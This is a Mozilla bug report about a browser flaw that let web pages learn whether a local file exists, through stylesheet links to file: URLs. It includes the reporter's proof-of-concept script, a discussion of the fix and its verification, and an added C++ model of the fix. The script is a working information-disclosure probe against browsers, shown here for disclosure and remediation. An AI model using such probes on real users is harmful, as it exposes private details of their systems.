Closed Bug 16858 Opened 25 years ago Closed 24 years ago

Shouldn't be able to check for local file existence

Categories

(Core :: Security, defect, P3)

x86
Windows 95
defect

VERIFIED FIXED

People

(Reporter: joro, Assigned: security-bugs)

Details

(Whiteboard: [nsbeta2+])

Attachments

(2 files)

It is possible to check for local file existence in Mozilla 5.0.

The problem is LINK REL=STYLESHEET TYPE="text/css" HREF="file:///C|/test.html"
returns "null" in document.styleSheets[0] if the file does not exist, otherwise
it returns an object.

The code is:
-------------------------------------------------------
<SCRIPT>
function f()
{
a.document.open();
s="<HTML><HEAD><LINK REL=STYLESHEET TYPE='text/css' HREF='"+
document.forms[0].elements[0].value+"'></HEAD><SCRIPT>function exist() "+
"{alert( document.styleSheets[0] ? 'File exists' : 'File does not exist ');};"+
"setTimeout('exist()',2000);</"+"SCRIPT></HTML>";
a.document.write(s);
a.document.close();
}
function main()
{
a=window.open("about:blank");
setTimeout("f()",2000);
}
</SCRIPT>
-------------------------------------------------------
Status: NEW → ASSIGNED
Target Milestone: M14
Target Milestone: M14 → M15
Not required for beta.
Bulk moving all Browser Security bugs to new Security: General component.  The 
previous Security component for Browser will be deleted.
Component: Security → Security: General
Keywords: beta2
We shouldn't require PSM if people want to use codebase principals.
Assignee: norris → mstoltz
Status: ASSIGNED → NEW
Disregard my last comments and reassign back to me. I applied the changes to the
wrong bug.
Assignee: mstoltz → norris
Status: NEW → ASSIGNED
Target Milestone: M15 → M16
Changing QA contact to myself.
QA Contact: dshea → junruh
Keywords: nsbeta2
Bulk reassigning most of norris's bugs to mstoltz.
Assignee: norris → mstoltz
Status: ASSIGNED → NEW
Putting on [nsbeta2+] radar for beta2 fix.
Summary: Checking for local file existence → Shouldn't be able to check for local file existence
Whiteboard: [nsbeta2+]
Changed QA contact to Cathy.
QA Contact: junruh → czhang
The bug is still there.
The CSS code needs to call nsScriptSecurityManager::CheckLoadURI() at every
entry point for a URL coming from a <STYLE HREF=> or other varieties of STYLE
tag. I need help in finding where these points are. Pierre, can we talk about
this? Or is there someone else I should ask?

What I need to know is a) where to check the URL, and b) how to exit gracefully
if the check fails.
Status: NEW → ASSIGNED
The place to put such a check is CSSLoaderImpl::LoadStyleLink().

If the check fails, returning NS_ERROR_FAILURE should be sufficient.

Pierre,
   I've got a patch which fixes this bug, could you please review it? I'll
attach it here. Also, are there any other functions in nsCSSLoader.cpp that
should be protected? I noticed LoadChildSheet() and LoadAgentSheet() both take a
URL parameter - do any of these come from URLs in the HTML?
Fix checked in. Added URL security check to STYLE tags. Can be turned off with
the security.checkloaduri pref.
Status: ASSIGNED → RESOLVED
Closed: 24 years ago
Resolution: --- → FIXED
document.styleSheets[] is returning NULL no matter whether the local file exists
or not, so there is no security problem here; it is fixed.
Status: RESOLVED → VERIFIED
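
Added example (not part of the original bug thread and not Mozilla's code): a simplified C++ model of the fix discussed above, where a load-URI check at the stylesheet-link entry point fails a file: link from a web page before any file access, so the result seen by script no longer depends on whether the file exists. The names CheckLoadURIModel, LoadStyleLinkModel and FileExistenceLeaks, the scheme-only policy, and the sample URLs are assumptions made for illustration; the checkLoadURI flag stands in for the security.checkloaduri pref.

```cpp
// Added illustration: a simplified model, not Mozilla's nsScriptSecurityManager
// or nsCSSLoader code. All names ending in "Model" are hypothetical.
#include <algorithm>
#include <cctype>
#include <iostream>
#include <set>
#include <string>

// Lower-cased scheme of a URL ("" if there is none).
static std::string SchemeOf(const std::string& url) {
    std::string::size_type colon = url.find(':');
    if (colon == std::string::npos) return "";
    std::string scheme = url.substr(0, colon);
    std::transform(scheme.begin(), scheme.end(), scheme.begin(),
                   [](unsigned char c) { return static_cast<char>(std::tolower(c)); });
    return scheme;
}

// Assumed policy: only a document that is itself file: may link to a file: URL.
bool CheckLoadURIModel(const std::string& source, const std::string& target) {
    return SchemeOf(target) != "file" || SchemeOf(source) == "file";
}

// Models the stylesheet-link entry point. Returns true when script in the
// document would see an object in document.styleSheets[0], false for null.
bool LoadStyleLinkModel(const std::string& docURL, const std::string& href,
                        const std::set<std::string>& localFiles,
                        bool checkLoadURI = true) {
    // The check runs before any file access, so a denied load fails the same
    // way (the thread suggests NS_ERROR_FAILURE) whether or not the file exists.
    if (checkLoadURI && !CheckLoadURIModel(docURL, href)) return false;
    if (SchemeOf(href) == "file") return localFiles.count(href) > 0;
    return true;  // non-file loads are outside this model and assumed to succeed
}

// True if a web page can tell an existing local file from a missing one.
bool FileExistenceLeaks(bool checkLoadURI) {
    const std::set<std::string> files = {"file:///C|/test.html"};  // constructed
    const std::string page = "http://example.test/probe.html";     // constructed
    return LoadStyleLinkModel(page, "file:///C|/test.html", files, checkLoadURI) !=
           LoadStyleLinkModel(page, "file:///C|/missing.html", files, checkLoadURI);
}

int main() {
    std::cout << "leak without check: " << FileExistenceLeaks(false) << "\n"
              << "leak with check:    " << FileExistenceLeaks(true) << "\n";
    return 0;
}
```

With the check disabled the two loads differ, which is the existence oracle the reporter described; with it enabled both return the same result, matching the verification comment above.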